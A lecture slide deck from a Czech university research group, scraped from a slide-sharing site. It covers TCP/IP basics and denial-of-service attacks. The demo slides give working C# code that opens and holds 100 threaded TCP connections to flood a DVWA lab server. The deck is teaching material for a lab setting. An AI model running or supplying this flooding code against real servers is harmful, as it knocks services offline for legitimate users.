NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

Slides:



Advertisements
Similar presentations
PJC CCNA Semester 2 Ver. 3.0 by William Kelly
Advertisements

Umut Girit  One of the core members of the Internet Protocol Suite, the set of network protocols used for the Internet. With UDP, computer.
Cisco 2 - Routers Perrine. J Page 14/30/2015 Chapter 10 TCP/IP Protocol Suite The function of the TCP/IP protocol stack is to transfer information from.
CISCO NETWORKING ACADEMY Chabot College ELEC Transport Layer (4)
CCNA – Network Fundamentals
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 OSI Transport Layer Network Fundamentals – Chapter 4.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 OSI Transport Layer Network Fundamentals – Chapter 4.
Transmission Control Protocol (TCP)
Intermediate TCP/IP TCP Operation.
CISCO NETWORKING ACADEMY PROGRAM (CNAP)
Chapter 7: Transport Layer
Lecture 7 Transport Layer
UDP & TCP Where would we be without them!. UDP User Datagram Protocol.
Chapter 7 – Transport Layer Protocols
CCNA 1 v3.1 Module 11 Review.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.0 OSI Transport Layer Network Fundamentals – Chapter 4.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Distributed Denial of Service Attacks CMPT Distributed Denial of Service Attacks Darius Law.
CSE 461: Transport Layer Connections. Naming Processes/Services  Process here is an abstract term for your Web browser (HTTP), servers (SMTP),
TCP/IP Network and Firewall. IP Packet Protocol  1 ICMP packet  6 TCP packet  17 UDP packet.
1 CCNA 2 v3.1 Module Intermediate TCP/IP CCNA 2 Module 10.
TCP. Learning objectives Reliable Transport in TCP TCP flow and Congestion Control.
WXES2106 Network Technology Semester /2005 Chapter 8 Intermediate TCP CCNA2: Module 10.
1 Computer Networks Transport Layer Protocols. 2 Application-layer Protocols Application-layer protocols –one “piece” of an app –define messages exchanged.
Chapter 4 OSI Transport Layer
Gursharan Singh Tatla Transport Layer 16-May
What Can IP Do? Deliver datagrams to hosts – The IP address in a datagram header identify a host IP treats a computer as an endpoint of communication Best.
Process-to-Process Delivery:
TRANSPORT LAYER T.Najah Al-Subaie Kingdom of Saudi Arabia Prince Norah bint Abdul Rahman University College of Computer Since and Information System NET331.
1 Transport Layer Computer Networks. 2 Where are we?
1 Semester 2 Module 10 Intermediate TCP/IP Yuda college of business James Chen
TCP/IP: Basics1 User Datagram Protocol (UDP) Another protocol at transport layer is UDP. It is Connectionless protocol i.e. no need to establish & terminate.
Transport Layer Layer #4 (OSI-RM). Transport Layer Main function of OSI Transport layer: Accept data from the Application layer and prepare it for addressing.
Jozef Goetz, Application Layer PART VI Jozef Goetz, Position of application layer The application layer enables the user, whether human.
1 7-Oct-15 OSI transport layer CCNA Exploration Semester 1 Chapter 4.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.0 OSI Transport Layer Network Fundamentals – Chapter 4.
Section 5: The Transport Layer. 5.2 CS Computer Networks John Mc Donald, Dept. of Computer Science, NUI Maynooth. Introduction In the previous section.
ICOM 6115©Manuel Rodriguez-Martinez ICOM 6115 – Computer Networks and the WWW Manuel Rodriguez-Martinez, Ph.D. Lecture 26.
Routers and Routing Basics CCNA 2 Chapter 10.
TCP1 Transmission Control Protocol (TCP). TCP2 Outline Transmission Control Protocol.
11 TRANSPORT LAYER PROTOCOLS Chapter 6 TCP and UDP SPX and NCP.
Transport Layer3-1 Chapter 3: Transport Layer Our goals: r understand principles behind transport layer services: m multiplexing/demultipl exing m reliable.
CCNA 1 v3.0 Module 11 TCP/IP Transport and Application Layers.
Networking Basics CCNA 1 Chapter 11.
Slide #1 CIT 380: Securing Computer Systems TCP/IP.
Transmission Control Protocol (TCP) BSAD 146 Dave Novak Sources: Network+ Guide to Networks, Dean 2013.
Page 12/9/2016 Chapter 10 Intermediate TCP : TCP and UDP segments, Transport Layer Ports CCNA2 Chapter 10.
Computer Network Architecture Lecture 6: OSI Model Layers Examples 1 20/12/2012.
01_NF_Ch04 – OSI Transport Layer ( 傳輸層 ) Source: CCNA Exploration.
© 2002, Cisco Systems, Inc. All rights reserved..
McGraw-Hill Chapter 23 Process-to-Process Delivery: UDP, TCP Copyright © The McGraw-Hill Companies, Inc. Permission required for reproduction or display.
TCP/IP1 Address Resolution Protocol Internet uses IP address to recognize a computer. But IP address needs to be translated to physical address (NIC).
Cisco I Introduction to Networks Semester 1 Chapter 7 JEOPADY.
Communication Networks NETW 501 Tutorial 2
2: Transport Layer 11 Transport Layer 1. 2: Transport Layer 12 Part 2: Transport Layer Chapter goals: r understand principles behind transport layer services:
1 14-Jun-16 S Ward Abingdon and Witney College CCNA Exploration Semester 1 OSI transport layer CCNA Exploration Semester 1 Chapter 4.
Process-to-Process Delivery:
Ch 3. Transport Layer Myungchul Kim
© 2006 Cisco Systems, Inc. All rights reserved.Cisco Public 1 OSI transport layer CCNA Exploration Semester 1 – Chapter 4.
3. END-TO-END PROTOCOLS (PART 1) Rocky K. C. Chang Department of Computing The Hong Kong Polytechnic University 22 March
UDP: User Datagram Protocol. What Can IP Do? Deliver datagrams to hosts – The IP address in a datagram header identify a host – treats a computer as an.
Port Scanning James Tate II
5. End-to-end protocols (part 1)
TCP Transport layer Er. Vikram Dhiman LPU.
Process-to-Process Delivery:
CS4470 Computer Networking Protocols
Lecture 2: Overview of TCP/IP protocol
Process-to-Process Delivery: UDP, TCP
The TCP/IP Model.
Transport Layer 9/22/2019.
Presentation transcript:

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba Czech Republic Denial of service (DOS)

navy.cs.vsb.cz 2 TCP/IP model vs. OSI-RM

navy.cs.vsb.cz 3 TCP/IP model

navy.cs.vsb.cz 4 IP protocol Definied in RFC: 791 Operates on OSI Layer 3 Allows to send independent packets between stations of the internetwork Unreliable connectionless service

navy.cs.vsb.cz 5 IP Header

navy.cs.vsb.cz 6 TCP/IP transport layer (TCP) Defined in RFC: 793 The transport-layer entity (i.e. process or service running on a particular machine) is identified by the machine's IP address and port number (which is local to the particular machine) Port number is 16bit number ( ) – : well-known services (80 - HTTP) – : other registered applications (1433 – MSSQL Server) – >4096 – client (ephemeral) ports (usually are assigned by the OS to the applications)

navy.cs.vsb.cz 7 TCP/IP transport layer (TCP&UDP) The transport-layer entity (i.e. process or service running on a particular machine) is identified by the machine's IP address and port number (which is local to the particular machine) Port number is 16bit number ( ) – : well-known services (80 - HTTP) – : other registered applications (1433 – MSSQL Server) – >4096 – client (ephemeral) ports (usually are assigned by the OS to the applications)

navy.cs.vsb.cz 8 TCP protocol Defined in RFC: 793 Provides a reliable duplex communication Over unreliable IP – IP may drop and duplicate packets and deliver them out of order – TCP protocol ensures reliability of data transfers for upper (application) layer protocols

navy.cs.vsb.cz 9 TCP Header

navy.cs.vsb.cz 10 TCP connection establishment Three way handshake: SYN, SYN+ACK,ACK – Initial sequence number negotiation (independently for both directions) – ISNs are „random“ to avoid confusing of the receiving station by delayed packets from previous connection between the same stations Opening of a connection by both sides simultaneously results in a single connection

navy.cs.vsb.cz 11 TCP connection establishment

navy.cs.vsb.cz 12 TCP connection data flow

navy.cs.vsb.cz 13 TCP connection termination Any side may close the connection first Both sides have to close the connection independently – FIN+ACK (from both sides)

navy.cs.vsb.cz 14 TCP connection in Wireshark

navy.cs.vsb.cz 15 Denial of service attack (DOS) A denial of service attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. For example: – attempts to flood a network, thereby preventing legitimate network traffic – attempts to disrupt connections between two machines, thereby preventing access to a service – attempts to prevent a particular individual from accessing a service – attempts to disrupt service to a specific system or person

navy.cs.vsb.cz 16 DOS – TCP SYN Flooding The goal is to prevent hosts or networks from communicating on the network. The client system begins by sending a SYN message to the server. The server then acknowledges the SYN message by sending SYN-ACK message to the client. The client then finishes establishing the connection by responding with an ACK message. – The connection between the client and the server is then open, and the service-specific data can be exchanged between the client and the server.

navy.cs.vsb.cz 17 DOS – TCP SYN Flooding The potential for abuse arises at the point where the server system has sent an acknowledgment (SYN-ACK) back to client but has not yet received the ACK message. – he server has built in its system memory a data structure describing all pending connections. This data structure is of finite size, and it can be made to overflow by intentionally creating too many partially-open connections.

navy.cs.vsb.cz 18 Demo - Tools Hosted web application (DVWA) Basic knowledge of some programming language (C#, Java, C++)

navy.cs.vsb.cz 19 Demo In.NET (C#) application we need to open TCP connection from client (attacker’s) application to the server. – Use System.Net.Sockets.TcpClient class TcpClient tcpClient = new TcpClient(); We need to open the connection on the specific IP address and specific port (HTTP protocol uses TCP80/ HTTPS protocol uses TCP443) – Use System.Net.IpEndpoint class IPEndPoint endPoint = new IPEndPoint(IPAddress.Parse(ipAddress), 80);

navy.cs.vsb.cz 20 Demo And finally we open the connection tcpClient.Connect(endPoint); To overload our testing web application, we need to open many connections. However all network operations are program-blocking. Thus we need open each connection in its own thread. – Use System.Threading.Thread class Thread thread = new Thread(FunctionDelegateToExecute); thread.Start();

navy.cs.vsb.cz 21 Demo Final method could looks like private static void SendRequest(string ipAddress, string threadName) { System.Net.Sockets.TcpClient tcpClient = new TcpClient(); IPEndPoint endPoint = new IPEndPoint(IPAddress.Parse(ipAddress), 80); try { tcpClient.Connect(endPoint); Console.WriteLine("Thread #{0}: {1}", threadName, DateTime.Now); } catch (Exception){} while (run) { Console.WriteLine("Thread #{0}: {1} sleeps", threadName, DateTime.Now); Thread.Sleep(1000); } tcpClient.Close(); }

navy.cs.vsb.cz 22 Demo Final application could looks like private static bool run = true; static void Main(string[] args) { string ipAddress = " XXX.XXX"; int threads = 100; List threadPool = new List (); for (int i = 0; i < threads; i++) { ThreadStart threadStart = () => SendRequest(ipAddress, i.ToString()); var thread = new Thread(threadStart) { IsBackground = true }; threadPool.Add(thread); thread.Start(); } Console.ReadLine(); run = false; foreach (var thread in threadPool) { thread.Abort(); }

navy.cs.vsb.cz 23 Demo – Legitimate traffic

navy.cs.vsb.cz 24 Demo – Legitimate traffic

navy.cs.vsb.cz 25 Demo Start Wireshark on the server with the DVWA application Start your malicious application doing the DoS attack and

navy.cs.vsb.cz 26 Demo Try to access the DVWA web application from browser

navy.cs.vsb.cz 27 Demo See the Wireshark log

navy.cs.vsb.cz 28 References DVWA - CERT CSRF - HACKING EXPOSED (ISBN: ) Penetration testing (ISBN-10: ) Principles of Computer Security (ISBN: )

navy.cs.vsb.cz 29 Warning Hacking is illegal because it is getting into a system another person owns. If you wanted to do legal hacking then you would have to own the system.

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.